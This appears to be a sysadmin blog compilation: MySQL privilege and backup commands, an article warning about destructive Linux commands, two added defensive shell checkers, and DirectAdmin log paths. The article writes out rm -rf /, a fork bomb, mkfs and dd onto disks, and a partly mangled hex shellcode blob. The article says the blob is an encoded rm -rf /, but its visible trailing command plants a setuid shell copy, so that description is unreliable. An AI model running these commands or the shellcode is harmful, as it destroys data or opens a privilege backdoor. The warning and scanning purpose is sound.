mysql> GRANT ALL PRIVILEGES ON DatabaseName.* TO Username@localhost;

or

mysql> GRANT ALL PRIVILEGES ON DatabaseName.* TO Username@localhost IDENTIFIED BY 'newpassword';

mysql> GRANT SELECT,INSERT,UPDATE,DELETE ON vworks.* TO newuser@localhost IDENTIFIED BY 'newpassword';


mysql> GRANT ALL PRIVILEGES ON DatabaseName.* TO Username@192.168.0.2 IDENTIFIED BY 'newpassword';

Now a user on the machine '192.168.0.2' can connect to the database. To allow a user to connect from anywhere you would use the wildcard '%' as the host.

mysql> GRANT ALL PRIVILEGES ON DatabaseName.* TO Username@localhost IDENTIFIED BY 'newpassword' WITH GRANT OPTION;

This would allow the user to log into the database and also to give others privileges to SELECT, INSERT, UPDATE or DELETE from the database.


REVOKING Privileges:
-------------------------

For example to REVOKE the privileges assigned to a user called 'user1':

mysql> REVOKE ALL PRIVILEGES ON DATABASENAME.* FROM user1@localhost;

Or just to remove UPDATE, INSERT and DELETE privileges so that data cannot be changed:

mysql> REVOKE INSERT,UPDATE,DELETE ON DATABASENAME.* FROM user1@localhost;
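The granting and revoking sections above single out three things to watch: a '%' host that lets a user connect from anywhere, ALL PRIVILEGES handed out where SELECT/INSERT/UPDATE/DELETE would do, and WITH GRANT OPTION, which lets the user pass privileges on. The following is an added example, not part of the original post: a shell filter that reads SHOW GRANTS output and flags those patterns, so a periodic review of a cPanel MySQL server can be automated. The sample GRANT lines it runs against are constructed, not taken from a real server.

```shell
#!/bin/sh
# Added example, not from the original post: review SHOW GRANTS output for
# the risky shapes discussed above. Reads one GRANT statement per line on
# stdin, as "mysql -N -e \"SHOW GRANTS FOR 'user'@'host'\"" prints them.

# audit_grants < grants.txt
# Prints "FLAG [reasons] <statement>" per finding; returns 1 if anything
# was flagged, 0 for a clean set of grants.
audit_grants() {
    flagged=0
    while IFS= read -r line; do
        case "$line" in
            ''|'--'*) continue ;;                  # skip blanks and comments
        esac
        reasons=""
        # Host '%' (quoted or bare): the account may log in from any address.
        case "$line" in *"@'%'"*|*"@%"*) reasons="$reasons any-host" ;; esac
        # ALL PRIVILEGES on a database: more than a web app needs.
        case "$line" in *"ALL PRIVILEGES ON"*) reasons="$reasons all-privileges" ;; esac
        # WITH GRANT OPTION: the account can create further grants itself.
        case "$line" in *"WITH GRANT OPTION"*) reasons="$reasons grant-option" ;; esac
        if [ -n "$reasons" ]; then
            echo "FLAG [${reasons# }] $line"
            flagged=1
        fi
    done
    return $flagged
}

# Demo on constructed SHOW GRANTS output (not from a real server).
if printf '%s\n' \
    "GRANT USAGE ON *.* TO 'john'@'localhost'" \
    "GRANT SELECT, INSERT, UPDATE, DELETE ON \`john_sales\`.* TO 'john'@'localhost'" \
    "GRANT ALL PRIVILEGES ON \`john_sales\`.* TO 'john'@'%' WITH GRANT OPTION" \
    | audit_grants
then
    echo "grants look tight"
fi
```

The empty "GRANT USAGE ON *.*" line that MySQL lists for every account is deliberately not flagged; it only records that the user exists. On a live server, feed the filter with mysql -N -e "SHOW GRANTS FOR 'user'@'host'" | audit_grants and act on a non-zero exit status.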


Backing Up DataBase:
-------------------------

mysqlhotcopy -u <username> -p <password> <database> /backup/location/


Which SHOULD copy all the tables (*.frm, *.MYI, *.MYD) into the new directory - the script does require the DBI perl module though. To restore these backup files simply copy them back into your MySQL data directory.


This is my preferred method of backing up. This outputs the table structure and data in series of SQL commands stored in a text file. The simplified syntax is

mysqldump -u <username> -p <database> > file.sql

eg:

mysqldump -u user1 -p accounts > dump.sql


Restoring a DataBase from Dump:
---------------------------------------

mysql -u <username> -p <database> < file.sql

eg:

mysql -u user1 -p accounts < dump.sql

Sunday, March 3, 2013

Deadly Commands You Should Never Run on Linux

rm -rf / – Deletes Everything!

The command rm -rf / deletes everything it possibly can, including files on your hard drive and files on connected removable media devices. This command is more understandable if it’s broken down:

rm – Remove the following files.

-rf – Run rm recursively (delete all files and folders inside the specified folder) and force-remove all files without prompting you.

/ – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices, including remote file shares and removable drives.

Linux will happily obey this command and delete everything without prompting you, so be careful when using it! The rm command can also be used in other dangerous ways – rm -rf ~ would delete all files in your home folder, while rm -rf .* would delete all your configuration files.

The Lesson: Beware rm -rf.
Disguised rm -rf /

Here’s another snippet of code that’s all over the web:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68?
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99?
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7?
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56?
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31?
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69?
“\x6e\x2f\x73\x68\x00\x2d\x63\x00?
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

This is the hex version of rm -rf / – executing this command would wipe out your files just as if you had run rm -rf /.

The Lesson: Don’t run weird-looking, obviously disguised commands that you don’t understand.
:(){ :|: & };: – Fork Bomb

The following line is a simple-looking, but dangerous, bash function:

:(){ :|: & };:

This short line defines a shell function that creates new copies of itself. The process continually replicates itself, and its copies continually replicate themselves, quickly taking up all your CPU time and memory. This can cause your computer to freeze. It’s basically a denial-of-service attack.

The Lesson: Bash functions are powerful, even very short ones.

mkfs.ext4 /dev/sda1 – Formats a Hard Drive

The mkfs.ext4 /dev/sda1 command is simple to understand:

mkfs.ext4 – Create a new ext4 file system on the following device.

/dev/sda1 – Specifies the first partition on the first hard drive, which is probably in use.

Taken together, this command can be equivalent to running format c: on Windows – it will wipe the files on your first partition and replace them with a new file system.

This command can come in other forms as well – mkfs.ext3 /dev/sdb2 would format the second partition on the second hard drive with the ext3 file system.

The Lesson: Beware running commands directly on hard disk devices that begin with /dev/sd.
command > /dev/sda – Writes Directly to a Hard Drive

The command > /dev/sda line works similarly – it runs a command and sends the output of that command directly to your first hard drive, writing the data directly to the hard disk drive and damaging your file system.

command – Run a command (can be any command.)

> – Send the output of the command to the following location.

/dev/sda – Write the output of the command directly to the hard disk device.

The Lesson: As above, beware running commands that involve hard disk devices beginning with /dev/sd.
dd if=/dev/random of=/dev/sda – Writes Junk Onto a Hard Drive

The dd if=/dev/random of=/dev/sda line will also obliterate the data on one of your hard drives.

dd – Perform low-level copying from one location to another.

if=/dev/random – Use /dev/random (random data) as the input – you may also see locations such as /dev/zero (zeros).

of=/dev/sda – Output to the first hard disk, replacing its file system with random garbage data.

The Lesson: dd copies data from one location to another, which can be dangerous if you’re copying directly to a device.

mv ~ /dev/null – Moves Your Home Directory to a Black Hole

/dev/null is another special location – moving something to /dev/null is the same thing as destroying it. Think of /dev/null as a black hole. Essentially, mv ~ /dev/null sends all your personal files into a black hole.

mv – Move the following file or directory to another location.

~ – Represents your entire home folder.

/dev/null – Move your home folder to /dev/null, destroying all your files and deleting the original copies.
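The defensive counterpart of this article is to read a script fetched from the web for exactly these shapes before anyone runs it. The following is an added example, not part of the original article: a small shell checker that flags the command patterns described above (rm -rf against /, ~ or .*, the fork bomb, mkfs or dd or a redirection aimed at a /dev/sd-style disk device, mv into /dev/null, and a long run of \x hex escapes like the disguised payload) without executing anything. The sample script it is tested against is constructed, and the patterns are heuristics for these specific forms, not a sandbox.

```shell
#!/bin/sh
# Added example, not from the original article: a pre-flight check that reads
# a shell script and flags the dangerous command shapes explained above.
# It only reads the file; nothing in it is executed. Patterns are heuristics
# for the forms shown in the article (plus -fr / -r -f spellings and other
# disk device names), not a complete analysis.

# scan_script FILE
# Prints "LINE <n>: <reason>: <text>" for each hit.
# Returns 0 if nothing matched, 1 if anything did, 2 if FILE is missing.
scan_script() {
    file=$1
    [ -f "$file" ] || { echo "no such file: $file" >&2; return 2; }
    hits=0
    n=0
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        reason=""
        if printf '%s' "$line" | grep -Eq 'rm[[:space:]]+(-[rRf]+[[:space:]]+)+(/|~/?|\.\*)([[:space:]]|$)'; then
            reason="recursive delete of root, home or dotfiles"
        elif printf '%s' "$line" | grep -Eq ':\(\)[[:space:]]*[{][[:space:]]*:[[:space:]]*[|][[:space:]]*:[[:space:]]*&[[:space:]]*[}];[[:space:]]*:'; then
            reason="fork bomb"
        elif printf '%s' "$line" | grep -Eq '(mkfs(\.[a-z0-9]+)?[[:space:]]+|dd[[:space:]].*of=|>[[:space:]]*)/dev/(sd|hd|nvme|vd|xvd)'; then
            reason="writes directly to a disk device"
        elif printf '%s' "$line" | grep -Eq 'mv[[:space:]]+[^>]*[[:space:]]/dev/null([[:space:]]|$)'; then
            reason="move into /dev/null"
        elif printf '%s' "$line" | grep -Eq '\\x[0-9a-fA-F]{2}(\\x[0-9a-fA-F]{2}){7,}'; then
            reason="long hex-escaped blob (disguised payload?)"
        fi
        if [ -n "$reason" ]; then
            echo "LINE $n: $reason: $line"
            hits=1
        fi
    done < "$file"
    return $hits
}

# Usage: sh scan_script.sh downloaded.sh [more.sh ...]
for f in "$@"; do
    scan_script "$f" || echo "$f: review before running" >&2
done
```

Two system-level guards complement this: GNU coreutils rm refuses a bare rm -rf / unless --no-preserve-root is given, and a per-user process limit (ulimit -u) caps how far a fork bomb can get. Neither replaces reading the script first, which is what the checker is for.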



Log File paths Directadmin panel

The first place you should go when trying to debug a problem is the log file for that program. The log files are as follows:

DirectAdmin:

/var/log/directadmin/error.log
/var/log/directadmin/errortaskq.log
/var/log/directadmin/system.log
/var/log/directadmin/security.log
Apache:

/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/httpd/suexec_log
/var/log/httpd/fpexec_log
/var/log/httpd/domains/domain.com.error.log
/var/log/httpd/domains/domain.com.log
/var/log/messages (generic errors)
Proftpd:

/var/log/proftpd/access.log
/var/log/proftpd/auth.log
/var/log/messages (generic errors)
PureFTPd:

/var/log/pureftpd.log
Dovecot and vm-pop3d:

/var/log/maillog
/var/log/messages
named (bind):

/var/log/messages
exim:

/var/log/exim/mainlog
/var/log/exim/paniclog
/var/log/exim/processlog
/var/log/exim/rejectlog

(on FreeBSD, they have "exim_" in front of the filenames)

mysqld:
RedHat:

/var/lib/mysql/server.hostname.com.err

FreeBSD and Debian:

/usr/local/mysql/data/server.hostname.com.err
crond:

/var/log/cron